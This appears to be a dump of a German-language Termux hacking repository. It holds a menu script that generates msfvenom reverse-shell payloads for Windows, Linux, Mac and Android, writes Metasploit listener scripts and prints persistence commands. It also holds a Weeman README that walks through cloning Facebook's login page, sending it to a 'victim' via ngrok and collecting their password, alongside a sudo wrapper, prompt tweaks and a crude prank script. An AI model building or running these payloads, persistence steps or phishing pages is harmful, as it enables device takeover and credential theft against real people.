 69 | options=("Windows" "Linux" "Mac" "Android" "List_All" "Quit")
 70 | select opt in "${options[@]}"
 71 | do
 72 |     case $opt in
 73 |         "Windows")
 74 |             read -p 'Set LHOST IP: ' uservar; read -p 'Set LPORT: ' userport
 75 |             msfvenom -p windows/meterpreter/reverse_tcp LHOST=$uservar LPORT=$userport -f exe > ~/Desktop/temp/shell.exe
 76 |             echo -e "\E[1;33m::::: \e[97mshell.exe saved to ~/Desktop/temp\E[1;33m:::::"
 77 |             ;;
 78 |         "Linux")
 79 |             read -p 'Set LHOST IP: ' uservar; read -p 'Set LPORT: ' userport
 80 |             msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$uservar LPORT=$userport -f elf > ~/Desktop/temp/shell.elf
 81 |             echo -e "\E[1;33m::::: \e[97mshell.elf saved to ~/Desktop/temp\E[1;33m:::::"
 82 |             ;;
 83 |         "Mac")
 84 |             read -p 'Set LHOST IP: ' uservar; read -p 'Set LPORT: ' userport
 85 |             msfvenom -p osx/x86/shell_reverse_tcp LHOST=$uservar LPORT=$userport -f macho > ~/Desktop/temp/shell.macho
 86 |             echo -e "\E[1;33m::::: \e[97mshell.macho saved to ~/Desktop/temp\E[1;33m:::::"
 87 |             ;;
 88 |         "Android")
 89 |             read -p 'Set LHOST IP: ' uservar; read -p 'Set LPORT: ' userport
 90 |             msfvenom -p android/meterpreter/reverse_tcp LHOST=$uservar LPORT=$userport R > ~/Desktop/temp/shell.apk
 91 |             echo -e "\E[1;33m::::: \e[97mshell.apk saved to ~/Desktop/temp\E[1;33m:::::"
 92 |             ;;  
 93 |         "List_All")
 94 |             xterm -e msvenom -l &
 95 |             ;;   
 96 |         "Quit")
 97 |             echo "Good Bye" && break
 98 |             ;;
 99 |         *) echo invalid option;;
100 |     esac
101 | done
102 |  ;;
103 | 
104 |   "2" | "2" )
105 | echo -e "\E[1;33m::::: \e[97mLets Craft a LISTNER\E[1;33m:::::"
106 | 
107 | PS3='Enter your choice 6=QUIT: '
108 | options=("Windows" "Linux" "Mac" "Android" "List_All" "Quit")
109 | select opt in "${options[@]}"
110 | do
111 |     case $opt in
112 |         "Windows")
113 |             touch ~/Desktop/temp/meterpreter.rc
114 |             echo use exploit/multi/handler > ~/Desktop/temp/meterpreter.rc
115 |             echo set PAYLOAD windows/meterpreter/reverse_tcp >> ~/Desktop/temp/meterpreter.rc
116 |             read -p 'Set LHOST IP: ' uservar
117 |             echo set LHOST $uservar >> ~/Desktop/temp/meterpreter.rc
118 |             read -p 'Set LPORT: ' uservar
119 |             echo set LPORT $uservar >> ~/Desktop/temp/meterpreter.rc
120 |             echo set ExitOnSession false >> ~/Desktop/temp/meterpreter.rc
121 |             echo exploit -j -z >> ~/Desktop/temp/meterpreter.rc
122 |             cat ~/Desktop/temp/meterpreter.rc
123 |             xterm -e msfconsole -r ~/Desktop/temp/meterpreter.rc &
124 |             ;;
125 |         "Linux")
126 |             touch ~/Desktop/temp/meterpreter_linux.rc
127 |             echo use exploit/multi/handler > ~/Desktop/temp/meterpreter_linux.rc
128 |             echo set PAYLOAD linux/x86/meterpreter/reverse_tcp >> ~/Desktop/temp/meterpreter_linux.rc
129 |             read -p 'Set LHOST IP: ' uservar
130 |             echo set LHOST $uservar >> ~/Desktop/temp/meterpreter_linux.rc
131 |             read -p 'Set LPORT: ' uservar
132 |             echo set LPORT $uservar >> ~/Desktop/temp/meterpreter_linux.rc
133 |             echo set ExitOnSession false >> ~/Desktop/temp/meterpreter_linux.rc
134 |             echo exploit -j -z >> ~/Desktop/temp/meterpreter_linux.rc
135 |             cat ~/Desktop/temp/meterpreter_linux.rc
136 |             xterm -e msfconsole -r ~/Desktop/temp/meterpreter_linux.rc &
137 |             exit
138 |             ;;
139 |         "Mac")
140 |             touch ~/Desktop/temp/meterpreter_mac.rc
141 |             echo use exploit/multi/handler > ~/Desktop/temp/meterpreter_mac.rc
142 |             echo set PAYLOAD osx/x86/shell_reverse_tcp >> ~/Desktop/temp/meterpreter_mac.rc
143 |             read -p 'Set LHOST IP: ' uservar
144 |             echo set LHOST $uservar >> ~/Desktop/temp/meterpreter_mac.rc
145 |             read -p 'Set LPORT: ' uservar
146 |             echo set LPORT $uservar >> ~/Desktop/temp/meterpreter_mac.rc
147 |             echo set ExitOnSession false >> ~/Desktop/temp/meterpreter_mac.rc
148 |             echo exploit -j -z >> ~/Desktop/temp/meterpreter_mac.rc
149 |             cat ~/Desktop/temp/meterpreter_mac.rc
150 |             xterm -e msfconsole -r ~/Desktop/temp/meterpreter_mac.rc &
151 |             ;;
152 |         "Android")
153 |             touch ~/Desktop/temp/meterpreter_droid.rc
154 |             echo use exploit/multi/handler > ~/Desktop/temp/meterpreter_droid.rc
155 |             echo set PAYLOAD osx/x86/shell_reverse_tcp >> ~/Desktop/temp/meterpreter_droid.rc
156 |             read -p 'Set LHOST IP: ' uservar
157 |             echo set LHOST $uservar >> ~/Desktop/temp/meterpreter_droid.rc
158 |             read -p 'Set LPORT: ' uservar
159 |             echo set LPORT $uservar >> ~/Desktop/temp/meterpreter_droid.rc
160 |             echo set ExitOnSession false >> ~/Desktop/temp/meterpreter_droid.rc
161 |             echo exploit -j -z >> ~/Desktop/temp/meterpreter_droid.rc
162 |             cat ~/Desktop/temp/meterpreter_droid.rc
163 |             xterm -e msfconsole -r ~/Desktop/temp/meterpreter_droid.rc &
164 |             ;;  
165 |         "List_All")
166 |             touch ~/Desktop/temp/payloads.rc
167 |             echo show payloads > ~/Desktop/temp/payloads.rc
168 |             cat ~/Desktop/temp/payloads.rc
169 |             xterm -e msfconsole -r ~/Desktop/temp/payloads.rc &
170 |             ;;   
171 |         "Quit")
172 |             echo "Good Bye" && break
173 |             ;;
174 |         *) echo invalid option;;
175 |     esac
176 | done
177 | ;;
178 | 
179 |  "3" | "3" )
180 |   # Accept upper or lowercase input.
181 |   echo -e "\E[1;33m::::: \e[97mStarting Metasploit \E[1;33m:::::"
182 |   msfconsole
183 |   use exploit/multi/handler  
184 | 
185 | ;;
186 | 
187 | 
188 |   "4" | "4" )
189 |   # 
190 |   echo -e "\E[1;33m::::: \e[97mPersistence Generator \E[1;33m:::::"
191 |  PS3='Enter your choice 5=QUIT: '
192 |  options=("Windows" "Linux" "Mac" "Android" "Quit")
193 |  select opt in "${options[@]}"
194 |  do
195 |     case $opt in
196 |         "Windows")
197 |             read -p 'Set LHOST IP: ' uservar; read -p 'Set LPORT: ' userport
198 |             echo -e "\E[1;33m::::: \e[97mrun persistence -U -X 30 -p $userport -r $uservar\E[1;33m:::::"
199 |             ;;
200 |         "Linux")
201 |             echo -e "\E[1;33m::::: \e[97mGet creative here :)\E[1;33m:::::"
202 |             ;;
203 |         "Mac")
204 |             echo 'Using directory /Applications/Utilities/'
205 |             read -p 'Enter payload file name :example *shell.macho: ' uservar; 
206 |             echo -e "\E[1;33m::::: \e[97mdefaults write /Library/Preferences/loginwindow AutoLaunchedApplicationDictionary -array-add ‘{Path=”/Applications/Utilities/$uservar”;}’\E[1;33m:::::"
207 |             ;;
208 |         "Android")
209 |             touch ~/Desktop/temp/android.sh
210 |             echo \#\!/bin/bash >> ~/Desktop/temp/android.sh
211 |             echo while : >> ~/Desktop/temp/android.sh
212 |             echo do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity >> ~/Desktop/temp/android.sh
213 |             echo sleep 20 >> ~/Desktop/temp/android.sh
214 |             echo done >> ~/Desktop/temp/android.sh
215 |             cat ~/Desktop/temp/android.sh
216 |             echo -e "\E[1;33m::::: \e[97mandroid.sh saved to ~/Desktop/temp. Upload to / on device\E[1;33m:::::" 
217 |             ;;  
218 |         "Quit")
219 |             echo "Good Bye" && break
220 |             ;;
221 |         *) echo invalid option;;
222 |     esac
223 | done
224 | ;;
225 | 
226 |   "5" | "5" )
227 |   # 
228 |   echo -e "\E[1;33m::::: \e[97mArmitage Launcher \E[1;33m:::::"
229 |   echo "armitage should be in /opt/armitage"
230 |   echo -e "\E[1;33m::::: \e[97mLaunching...\E[1;33m:::::"
231 |   xterm -e sudo java -jar /opt/armitage/armitage.jar & 
232 | 
233 | ;;
234 | 
235 |  "x" | "x" )
236 | clear
237 | echo        We have a Zero Bug attacking all the login and
238 | echo        overlay files.
239 | echo                                PLAGUE
240 | echo        Run anti-virus. Give me a systems display!
241 | echo
242 | echo        The systems display comes up. Red flashes everywhere,
243 | echo        signifying new attacks. Plague presses a key.
244 | echo
245 | echo                                PLAGUE
246 | echo        Die, dickweeds!
247 | echo
248 | echo                                HAL
249 | echo        The rabbit is in the administration system.
250 | echo
251 | echo        Rabbit icons start to fill the systems display.
252 | echo
253 | echo                                PLAGUE
254 | echo        Send a Flu-shot.
255 | echo
256 | echo                                MARGO
257 | echo        Rabbit, Flu-shot, someone talk to me.
258 | echo
259 | echo                                HAL
260 | echo        A rabbit replicates till it overloads a file,
261 | echo        then it spreads like cancer.
262 | echo -e "\e[31m[Owning Gibson / Please wait...\e[31m]"
263 | echo -ne '#####                     (33%)\r'
264 | sleep 3
265 | echo -ne '#############             (66%)\r'
266 | sleep 3
267 | echo -ne '#######################   (100%)\r'
268 | echo -ne '\n'
269 | echo Stager sent! Starting session.. ....
270 | echo root@Gibson~#
271 | 
272 | 
273 | ;;
274 | 
275 |           * )
276 |    # Default option.      
277 |    # 
278 |    echo
279 |    echo "Not yet in database."
280 |   ;;
281 | 
282 | esac
283 | 
284 | tput sgr0                               # Reset colors to "normal."
285 | 
286 | echo
287 | 
288 | exit 0
289 | 


--------------------------------------------------------------------------------
/metasploit2019/README.md:
--------------------------------------------------------------------------------
 1 | # Metasploit "ERROR FREE" on Termux
 2 | 
 3 |   git clone https://github.com/GottModusTermux/G0D.git
 4 | 
 5 |   pkg install unzip -y
 6 | 
 7 |   cd G0D/metasploit2019/
 8 | 
 9 |   unzip metasploit.zip
10 | 
11 |   cd metasploit
12 | 
13 |   pip install bundler 
14 |   
15 |   pip install bundle 
16 |   
17 |   gem install bundler 
18 | 
19 |   chmod +x * 
20 | 
21 |   bash metasploit.sh
22 | ____
23 | 
24 |   cd
25 | 
26 |   cd metasploit-framework
27 | 
28 |   msfconsole
29 | 
30 | # https://t.me/joinchat/KCZWlxJt2j87ZuuXLocKSA
31 | >Termux Telegram Gruppe GER-Unterstützung 
32 | 
33 | https://youtu.be/B_49pqaXpAs  <--Tutorial
34 |  Hier habe ich ein Video für euch hochgeladen,
35 | um euch zu zeigen wie die Installertion durchgeführt wird,
36 | und anschließend "Metasploit" gestartet wird.
37 | 
38 | Letzter Test:09.dez.2018
39 |  mit meiner Anleitung, gibt es keine Fehler
40 | 


--------------------------------------------------------------------------------
/metasploit2019/metasploit.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GottModusTermux/G0D/b3661e3b30b7d0deb9e26bef2c1951837be9c13b/metasploit2019/metasploit.zip


--------------------------------------------------------------------------------
/mutterficker.sh:
--------------------------------------------------------------------------------
 1 | #!/data/data/com.termux/files/usr/bin/bash -e
 2 | 
 3 | # colors
 4 | 
 5 | red='\033[1;31m'
 6 | reset='\033[0m'
 7 | 
 8 | printf "$red"
 9 | echo "MutterFick prozess gestartet.."
10 | 
11 | sleep 2
12 | echo
13 | echo
14 | echo
15 | echo "start"
16 | echo
17 | sleep 3
18 | echo "1%"
19 | sleep 2
20 | echo "3%"
21 | sleep 3
22 | echo "7%"
23 | sleep 1
24 | echo "12%"
25 | sleep 1
26 | echo "24%"
27 | sleep 4
28 | echo "64%"
29 | sleep 2
30 | echo "81%"
31 | sleep 1
32 | echo "92%"
33 | sleep 1
34 | echo "100%"
35 | sleep 2
36 | echo
37 | echo "Fertig !!"
38 | printf "$reset"
39 | 
40 | sleep 3
41 | 
42 | clear
43 | echo
44 | echo
45 | echo
46 | 
47 | printf "$red"
48 | echo "Gratulation.."
49 | sleep 2
50 | echo
51 | echo
52 | echo "Mütter wurden erfolgreich gefickt"
53 | sleep 3
54 | echo
55 | echo
56 | echo
57 | echo "MutterFick prozess erfolgreich durchgefürht !!"
58 | printf "$reset"
59 | sleep 7
60 | clear
61 | 
62 | ls
63 | 
64 | exit
65 | 


--------------------------------------------------------------------------------
/ngrok:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GottModusTermux/G0D/b3661e3b30b7d0deb9e26bef2c1951837be9c13b/ngrok


--------------------------------------------------------------------------------
/style/README.md:
--------------------------------------------------------------------------------
 1 | experimental style beta test:
 2 | 
 3 |  cd
 4 |  cd ..
 5 |  cd usr/etc
 6 |  nano bash.bashrc
 7 |  
 8 |  PS1='\033[1;91mroot@$$$$[\033[1;93m\W\033[1;91m]: \033[1;92m' 
 9 |  
10 |  ...in einer neuen Zeile einfügen im Editor beim geöffnetem Dokument
11 |  speichern.. termux neu starten
12 |  kein download erfoderlich
13 | 
14 | 
15 | 
16 |  >GitHub: https://github.com/GottModusTermux/
17 |  
18 |  - cd G0D
19 |  
20 |  - cp bash.zip $HOME && cd
21 |  
22 |  - ls
23 |  
24 |  - unzip bash.zip
25 |  
26 |  - pkg install nano -y && pkg install figlet -y && pkg install toilet
27 |  
28 |  - cd ..
29 |  
30 |  - ls
31 |  
32 |  - cd usr/etc
33 |  
34 |  - ls -a
35 |  
36 |  - rm motd
37 |  
38 |  - nano bash.bashrc
39 |  
40 |  
41 | eines der folgenden Zeilen in das geöffnete Dokument 
42 | (nano bash.bashrc) einfügen:
43 |  
44 |  >1. figlet -f slant $$$$  
45 |  >2. toilet $$$$ --metal   
46 |  
47 |  
48 | die Geldzeichen [$$$$] gegen ein Wort deiner Wahl austauschen,
49 | schon wird es dir bei jedem Start als Titel-logo angezeigt
50 | 
51 | "Welcome to Termux.. pkg search .. pkg upgrade/update"
52 | ...dieser Text wird mit deinem ersetzt ;)
53 | Allgemein ändern sich nun auch die farben vom Interface
54 | (schriften, ordner
55 | 
56 | Hier hab ich euch mal ein Video hochgeladen,
57 | wie das ganze durchgeführt wird, 
58 | und wie das ganze dann aussieht.
59 | 
60 | >https://www.youtube.com/watch?v=xzL-B5poIv4&t=57s&app=desktop
61 | 
62 | __________
63 | # https://t.me/joinchat/KCZWlxJt2j87ZuuXLocKSA
64 |  >Termux Telegram Gruppe GER-Unterstützung 
65 | 


--------------------------------------------------------------------------------
/style/bash.bashrc:
--------------------------------------------------------------------------------
 1 | command_not_found_handle() {
 2 | 	/data/data/com.termux/files/usr/libexec/termux/command-not-found "$1"
 3 | }
 4 | 
 5 | figlet -f slant g0d-
 6 | figlet -f slant m0de
 7 | 
 8 | PS1='\[\e[31m\]┌─[\[\e[37m\]\T\[\e[31m\]]───\e[1;98m[@g0d-m0de]\e[0;31m───[\#]\n|\n\e[0;31m└─[\[\e[31m\]\e[0;35m\W\
 9 |  [\e[31m\]]───►\e[1;93m'
10 | 


--------------------------------------------------------------------------------
/style/bash.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/GottModusTermux/G0D/b3661e3b30b7d0deb9e26bef2c1951837be9c13b/style/bash.zip


--------------------------------------------------------------------------------
/style/optik.sh:
--------------------------------------------------------------------------------
1 |  #!/data/data/com.termux/files/usr/bin/bash -e
2 |  
3 |  pkg install figlet -y
4 |  rm /data/data/com.termux/files/usr/etc/bash.bashrc
5 |  cp bash.bashrc /data/data/com.termux/files/usr/etc
6 |  rm /data/data/com.termux/files/usr/etc/motd
7 |  
8 |  exit
9 | 


--------------------------------------------------------------------------------
/sudo/READ.me:
--------------------------------------------------------------------------------
 1 | Ultimate Linux Terminal on Android 
 2 |  #GottModusTermux <---
 3 |  
 4 |   SUPERUSER DO !! aka. SUDO
 5 | 
 6 | follow the next steps for SUDO
 7 |  >Copy&Paste:
 8 | 
 9 | termux-setup-storage
10 | 
11 | apt update && apt upgrade
12 | 
13 | apt install git
14 | 
15 | pkg install ncurses-utils
16 | 
17 | git clone https://github.com/GottModusTermux/G0D.git && cd G0D/sudo
18 | 
19 | apt install fish -y && fish
20 | 
21 | cat sudo > /data/data/com.termux/files/usr/bin/sudo
22 | 
23 | chmod 700 /data/data/com.termux/files/usr/bin/sudo 
24 | 
25 | exit
26 | 
27 | sudo
28 | _________
29 | 
30 | $import "G0D-master.zip" in your Termux
31 | 
32 | For example, if the ZIP is in your /0/Download/ folder,
33 | 
34 | Copy&Paste the next commands:
35 | 
36 | termux-setup-storage
37 | 
38 | cd storage/downloads/
39 | 
40 | cp -f G0D-master.zip $HOME
41 | 
42 | cd
43 | 
44 | pkg install zip
45 | 
46 | unzip G0D-master.zip && cd G0D-master/sudo
47 | 
48 | apt update && apt upgrade
49 | 
50 | pkg install ncurses-utils
51 | 
52 | apt install fish && fish
53 | 
54 | cat sudo > /data/data/com.termux/files/usr/bin/sudo
55 | 
56 | chmod 700 /data/data/com.termux/files/usr/bin/sudo
57 | 
58 | exit
59 | 
60 | sudo
61 | 
62 | ____
63 | #GottModusTermux
64 | 


--------------------------------------------------------------------------------
/sudo/sudo:
--------------------------------------------------------------------------------
  1 | #!/data/data/com.termux/files/usr/bin/bash
  2 | 
  3 | #set colored=true to turn on colored error messages
  4 | #set colored=false to turn off colored error messages
  5 | colored=true
  6 | 
  7 | #red=1 green=2 yellow=3
  8 | color() {
  9 | 	if [ $colored == "true" ]; then
 10 | 		echo "$(tput setaf $1)${*:2}$(tput sgr0)"
 11 | 	else
 12 | 		echo "${*:2}"
 13 | 	fi
 14 | }
 15 | 
 16 | show_usage() {
 17 | 	echo -e "\n`color 3 Usage:`\n"
 18 | 	echo 'sudo su [-]'
 19 | 	echo -e "  `color 2 Drop to root shell`\n"
 20 | 	echo 'sudo <command> [<args>]'
 21 | 	echo -e "  `color 2 Run command as root with optional arguments`\n"
 22 | 	exit
 23 | }
 24 | 
 25 | SYSBIN=/system/bin
 26 | SYSXBIN=/system/xbin
 27 | BB=$SYSXBIN/busybox
 28 | PRE=/data/data/com.termux/files
 29 | ROOT_HOME=$PRE/home/.suroot
 30 | BINPRE=$PRE/usr/bin
 31 | LDLP="export LD_LIBRARY_PATH=$PRE/usr/lib"
 32 | CMDLINE="PATH=$PATH:$SYSXBIN:$SYSBIN;$LDLP;HOME=$ROOT_HOME;cd $PWD"
 33 | 
 34 | if [ -x /magisk/.core/bin/su ]; then
 35 | 	SU=/magisk/.core/bin/su
 36 | elif [ -x /sbin/su ]; then
 37 | 	SU=/sbin/su
 38 | elif [ -x $SYSXBIN/su ]; then
 39 | 	SU=$SYSXBIN/su
 40 | elif [ -x /su/bin/su ]; then
 41 | 	SU=/su/bin/su
 42 | else
 43 | 	echo -e "\n`color 1 su` executable not found"
 44 | 	echo -e "`color 1 sudo` requires `color 1 su`\n"
 45 | 	exit
 46 | fi
 47 | 
 48 | if [ ! -d $ROOT_HOME ]; then
 49 | 	if [ -x $BB ] && [ $($BB --list | grep -w mount) == "mount" ]; then
 50 | 		MOUNTEX="$BB mount"
 51 | 	elif [ -x $SYSBIN/mount ]; then
 52 | 		MOUNTEX="$SYSBIN/mount"
 53 | 	else
 54 | 		echo -e "\nCannot find `color 1 mount` executable"
 55 | 		echo -e "`color 2 Unable to setup sudo`\n"
 56 | 		exit
 57 | 	fi
 58 | 	MOUNT_RW="$MOUNTEX -o rw,remount,rw /system"
 59 | 	MOUNT_RO="$MOUNTEX -o ro,remount,ro /system"
 60 | 	if [ -x "/sbin/magisk" ]; then
 61 | 		unset LD_LIBRARY_PATH
 62 | 		$SU -c "$CMDLINE;$MOUNT_RW"
 63 | 		$SU -c "$CMDLINE;mkdir $ROOT_HOME"
 64 | 		$SU -c "$CMDLINE;chmod 700 $ROOT_HOME"
 65 | 		BASHRC="'PS1=\"# \"\nexport TERM=$TERM\n$LDLP\nexport PATH=$PATH:$SYSXBIN:$SYSBIN'"
 66 | 		$SU -c "$CMDLINE;echo -e $BASHRC > $ROOT_HOME/.bashrc"
 67 | 		$SU -c "$CMDLINE;chmod 700 $ROOT_HOME/.bashrc"
 68 | 		$SU -c "$CMDLINE;$MOUNT_RO"
 69 | 	else
 70 | 		$SU -c "$MOUNT_RW"
 71 | 		$SU -c "mkdir $ROOT_HOME"
 72 | 		$SU -c "chmod 700 $ROOT_HOME"
 73 | 		BASHRC="'PS1=\"# \"\nexport TERM=$TERM\n$LDLP\nexport PATH=$PATH:$SYSXBIN:$SYSBIN'"
 74 | 		$SU -c "echo -e $BASHRC > $ROOT_HOME/.bashrc"
 75 | 		$SU -c "chmod 700 $ROOT_HOME/.bashrc"
 76 | 		$SU -c "$MOUNT_RO"
 77 | 	fi
 78 | fi
 79 | 
 80 | ARGS=$(printf '%q ' "$@")
 81 | 
 82 | if [ -z "$*" ]; then
 83 | 	show_usage
 84 | elif [ $1 == "su" ]; then
 85 | 	CMDLINE="$CMDLINE;$BINPRE/bash"
 86 | elif [ -x "$BINPRE/$1" ]; then
 87 | 	CMDLINE="$CMDLINE;$BINPRE/$ARGS"
 88 | elif [ -x $SYSBIN/$1 ] || [ -x $SYSXBIN/$1 ] || [ -x $1 ]; then
 89 | 	CMDLINE="$CMDLINE;$ARGS"
 90 | else
 91 | 	echo -e "\nCommand `color 1 $1` not found"
 92 | 	echo -e "`color 2 Check your spelling and try again`\n"
 93 | fi
 94 | 
 95 | pre_env_chk=`$SU --help|grep -e --preserve-environment`
 96 | 
 97 | if [ -x "/sbin/magisk" ]; then
 98 | 	unset LD_LIBRARY_PATH
 99 | fi
100 | 
101 | if [ -n "$pre_env_chk" ]; then
102 |         $SU --preserve-environment -c "$CMDLINE"
103 | else
104 |         $SU -c "$CMDLINE"
105 | fi
106 | 
107 | # Reset echo
108 | stty sane


--------------------------------------------------------------------------------
/sudogottmodus.sh:
--------------------------------------------------------------------------------
  1 | #!/data/data/com.termux/files/usr/bin/bash -e
  2 | 
  3 | # colors
  4 | 
  5 | red='\033[1;31m'
  6 | yellow='\033[1;33m'
  7 | blue='\033[1;34m'
  8 | reset='\033[0m'
  9 | 
 10 | apt-get upgrade -y
 11 | apt-get update
 12 | printf "$red"
 13 | echo "Du musst gleich.."
 14 | echo "auf >Zulassen< klicken !!"
 15 | printf "$reset"
 16 | 
 17 | sleep 3
 18 | 
 19 | termux-setup-storage
 20 | 
 21 | sleep 5
 22 | 
 23 | printf "$yellow"
 24 | echo "sudo wird installiert"
 25 | sleep 2
 26 | echo "lehnt euch zurück.."
 27 | sleep 2
 28 | echo "GottModusTermux macht das schon"
 29 | echo ".. keine sorge ;D"
 30 | sleep 2
 31 | 
 32 | echo
 33 | echo "Jetzt gehts los.."
 34 | sleep 3
 35 | echo "in 3.."
 36 | sleep 3
 37 | echo "2.."
 38 | sleep 2
 39 | echo "1.."
 40 | sleep 2
 41 | printf "$reset"
 42 | 
 43 | apt install git -y
 44 | pkg install ncurses-utils
 45 | pkg install nano -y
 46 | 
 47 | git clone https://github.com/GottModusTermux/G0D.git
 48 | 
 49 | cd G0D
 50 | cd sudo
 51 | ls
 52 | 
 53 | sleep 4
 54 | 
 55 | cat sudo > /data/data/com.termux/files/usr/bin/sudo
 56 | 
 57 | chmod 700 /data/data/com.termux/files/usr/bin/sudo
 58 | 
 59 | cd $HOME
 60 | 
 61 | 
 62 | printf "$blue"
 63 | echo "so das wars ja schon"
 64 | sleep 2
 65 | echo "sudo ist nun einsatz bereit !!"
 66 | sleep 2
 67 | echo "als letztes testen wir noch sudo"
 68 | printf "$reset"
 69 | echo
 70 | printf "$red"
 71 | echo
 72 | echo "DU MUSST"
 73 | echo "TERMUX"
 74 | echo "ROOT-RECHTE"
 75 | echo "GEBEN !!"
 76 | printf "$reset"
 77 | 
 78 | sleep 5
 79 | 
 80 | sudo
 81 | 
 82 | sleep 7
 83 | 
 84 | echo "alles gut ? okaay das wars ;D"
 85 | 
 86 | sleep 2
 87 | 
 88 | printf "$red"
 89 | echo "und jetzt bin ich auch schon weg.."
 90 | sleep 2
 91 | echo "besucht meine github seite !"
 92 | sleep 2
 93 | echo "github.com/GottModusTermux/G0D"
 94 | printf "$reset"
 95 | sleep 3
 96 | printf "$blue"
 97 | echo "github.com/GottModusTermux/G0D"
 98 | printf "$reset"
 99 | sleep 3
100 | printf "$red"
101 | echo "github.com/GottModusTermux/G0D"
102 | printf "$reset"
103 | sleep 2
104 | 
105 | exit
106 | 
107 | 
108 | 
109 | 


--------------------------------------------------------------------------------
/weeman/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | history.log
3 | 


--------------------------------------------------------------------------------
/weeman/ChangeLog:
--------------------------------------------------------------------------------
 1 | * Version 1.0 <10-09-2015>:
 2 |     Initial release.
 3 | 
 4 | * Version 1.1 (Wein) <12-09-2015>:
 5 | 	Added redirect to orignal site.
 6 | 	Bug fixes
 7 | 
 8 | * Version 1.2.2 (Popi) <16-09-2015>:
 9 | 	Screenshot updated.
10 | 	Files moved from one script to core/.
11 | 	Bug fixes
12 | 	ASCII logo replaced.
13 | 
14 | Version 1.3 (ArmWork) <26-09-2015>:
15 | 	Added restore from session.
16 | 	Bug fixes
17 | 
18 | Version 1.4 (Ping) <05-10-2015>:
19 | 	Added quiet_mode.
20 | 	Bug (#4) fixes.
21 | 	Added root check for port 80.
22 | 	Added html_file option.
23 | 	using optparse
24 | 	Replacing files/images/scripts with full locations.
25 | 	Headers files updated.
26 | 
27 | Version 1.5 (GreenTree) 10-10-2015:
28 | 	url, action_url http://localhost changed to None
29 | 	Beautifulsoup dependency removed.
30 | 
31 | Version 1.6 (Black-eagle) 22-11-2015:
32 | 	Added command line options.
33 | 	Added framework.py
34 | 	Added modules/is_website_up.pu module.
35 | 	Code cleanup.
36 | 	Windows not supported!
37 | 
38 | Version 1.7 (Scratch) 25-03-2016:
39 | 	Added profiles
40 | 	Added module whois_ip.py
41 | 	Added module extract_links.py
42 | 	Added new tool tools/switch_ip_forward.sh
43 | 	Tool Removed tools/weeman_ettercap.sh
44 | 	Core updated.
45 | 	Bug fixes.
46 | 
47 | Version 1.7.1 (Final):
48 |   Framework removed.
49 |   bs4 updated.
50 |   this is the last version of weeman.
51 | 


--------------------------------------------------------------------------------
/weeman/README.md:
--------------------------------------------------------------------------------
  1 | # Weeman - http server for phishing
  2 | 
  3 | # Zuerst "ngrok"
  4 | 
  5 | SCHRITT FÜR SCHRITT "WEEMAN" IN TERMUX INSTALLIEREN :-
  6 | Teilen Sie Ihre Links über das Internet und schappen Sie sich die Login-daten
  7 |  --> installieren NGROK im vorraus
  8 | 
  9 | -gehe per Browser auf https://ngrok.com/download und lade die "Linux ARM" Zip
 10 | 
 11 | -in Termux nutzen wir jetzt folgende Befehle:
 12 | 
 13 | 1. > cd /sdcard/download
 14 | 2. > unzip ngrok.zip
 15 | 3. > cp ngrok $HOME
 16 | 4. > cd $HOME
 17 | 5. > ls
 18 | 6. > chmod 777 ngrok
 19 | 7. > ./ngrok
 20 | 8. > ./ngrok authtoken 844ZM.... [kopiere den Orginal Code der dir angezeigt wird, sobald du dich eingelogt hast]
 21 | 
 22 |  zu 8.: ohne Authentifizierungs-Token läuft der Server bei NGROK max. 8h !!
 23 |         meldest Sie sich auf https://ngrok.com/ an und loggen Sie sich ein,
 24 |         um den Authentifizierungs-Token zu erhalten
 25 |         den Sie einfach in Termux einfügen
 26 | 
 27 | # Installieren
 28 | 
 29 | TIPPE
 30 | 
 31 | 
 32 |  > apt update && apt upgrade
 33 | 
 34 | dann TIPPE
 35 | 
 36 | 
 37 |  > pkg install git
 38 | 
 39 | kopieren den folgenden Link
 40 | 
 41 | 
 42 |  > git clone https://github.com/GottModusTermux/G0D
 43 | 
 44 |  > ls
 45 | 
 46 |  > cd G0D/weeman
 47 | 
 48 |  > pkg install python2
 49 | 
 50 |  > ls
 51 | 
 52 |  > python2 weeman.py
 53 |   
 54 | # Ausführen
 55 | 
 56 | nach dem Start folgende befehle
 57 | 
 58 | -Befehl 1 
 59 | 
 60 |  > set url yoursite.com
 61 | 
 62 | -Befehl 2 
 63 | 
 64 |  > set port 8080
 65 | 
 66 | -Befehl 3 
 67 | 
 68 |  > set action_url yoursite.com
 69 |   
 70 | -Befehl 4
 71 | 
 72 |  > run
 73 |   
 74 | Nun öffnet ihr einen Browser und sucht
 75 | LOCALHOST:8080 oder 127.0.0.1:8080.
 76 | 
 77 | # ERÖFFNE EINE FACEBOOK-PHISHING SEITE.
 78 | 
 79 | -TIPPE:
 80 | 
 81 |  > cd G0D/weeman
 82 | 
 83 |  > python2 weeman.py
 84 | 
 85 |  > set url https://www.facebook.com/
 86 | 
 87 |  > set port 8080
 88 | 
 89 |  > set action_url https://www.facebook.com/
 90 | 
 91 |  > run
 92 | 
 93 | Jetzt können Sie Ihre Facebook-Phishing Seite einfach per Ngrok an Ihr Opfer weiterleiten...
 94 | 
 95 | -Neues Termux Fenster öffnen
 96 | 
 97 | -gehe zum Ordner wo NGROK vorhanden ist
 98 | (hier im ordner G0D.... )
 99 |   > cd G0D
100 | 
101 |   > ./ngrok http 8080
102 | 
103 | Oben rechts den unteren Link kopieren, und nun verschicken
104 | Beispiel:
105 | "https://denLinkKopieren.ngrok.io -> localhost:8080
106 | 
107 | sobald das Opfer seine Login-Daten eingegeben hat, 
108 | können Sie seine E-Mail-ID und sein Passwort in dem Termux Fenster "weeman" einsehen
109 | (hochscrollen und "user: " | "pass: "suchen)
110 | 
111 | sobald "ngrok" beendet wird, ist der erstellte Link nicht mehr erreichbar !! 
112 | 
113 | 
114 | HTTP server for phishing in python.
115 | Version 1.7.1 is the last and latest version for weeman.
116 | 


--------------------------------------------------------------------------------
/weeman/contributors.txt:
--------------------------------------------------------------------------------
 1 | Weeman contributors
 2 | --------------------
 3 | 
 4 | Thanks to these nice people:
 5 | ----------------------------
 6 | 
 7 | DeveloppSoft (developpsoft.github.io) - Fixed english mistake and list cmd in framework
 8 | Bugzap91 - for the link patch.
